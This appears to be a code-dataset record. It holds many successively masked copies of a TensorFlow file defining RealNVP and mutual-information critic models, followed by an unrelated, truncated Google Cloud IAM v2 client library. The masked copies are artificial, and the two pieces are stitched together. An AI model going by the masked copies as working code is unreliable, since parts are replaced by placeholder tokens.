"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n <function token>\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n <function token>\n <function token>\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n\n\nclass InnerProdCritic(tf.keras.Model):\n <function token>\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n <function token>\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n\n\nclass BilinearCritic(tf.keras.Model):\n <function token>\n <function token>\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass ConcatCritic(tf.keras.Model):\n <function token>\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass ConcatCritic(tf.keras.Model):\n <function token>\n <function token>\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SeparableCritic(tf.keras.Model):\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n<class token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,824 | 803429f65cdfbd975c4370498d8c4c799ee84bbc | """Generated client library for iam version v2."""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.iam.v2 import iam_v2_messages as messages
class IamV2(base_api.BaseApiClient):
"""Generated client library for service iam version v2."""
MESSAGES_MODULE = messages
BASE_URL = 'https://iam.googleapis.com/'
MTLS_BASE_URL = 'https://iam.mtls.googleapis.com/'
_PACKAGE = 'iam'
_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']
_VERSION = 'v2'
_CLIENT_ID = 'CLIENT_ID'
_CLIENT_SECRET = 'CLIENT_SECRET'
_USER_AGENT = 'google-cloud-sdk'
_CLIENT_CLASS_NAME = 'IamV2'
_URL_VERSION = 'v2'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new iam handle."""
url = url or self.BASE_URL
super(IamV2, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.policies_operations = self.PoliciesOperationsService(self)
self.policies = self.PoliciesService(self)
class PoliciesOperationsService(base_api.BaseApiService):
"""Service class for the policies_operations resource."""
_NAME = 'policies_operations'
def __init__(self, client):
super(IamV2.PoliciesOperationsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.
Args:
request: (IamPoliciesOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}',
http_method='GET',
method_id='iam.policies.operations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v2/{+name}',
request_field='',
request_type_name='IamPoliciesOperationsGetRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
class PoliciesService(base_api.BaseApiService):
"""Service class for the policies resource."""
_NAME = 'policies'
def __init__(self, client):
super(IamV2.PoliciesService, self).__init__(client)
self._upload_configs = {
}
def CreatePolicy(self, request, global_params=None):
r"""Creates a policy.
Args:
request: (IamPoliciesCreatePolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('CreatePolicy')
return self._RunMethod(
config, request, global_params=global_params)
CreatePolicy.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}',
http_method='POST',
method_id='iam.policies.createPolicy',
ordered_params=['parent'],
path_params=['parent'],
query_params=['policyId'],
relative_path='v2/{+parent}',
request_field='googleIamV2Policy',
request_type_name='IamPoliciesCreatePolicyRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes a policy. This action is permanent.
Args:
request: (IamPoliciesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
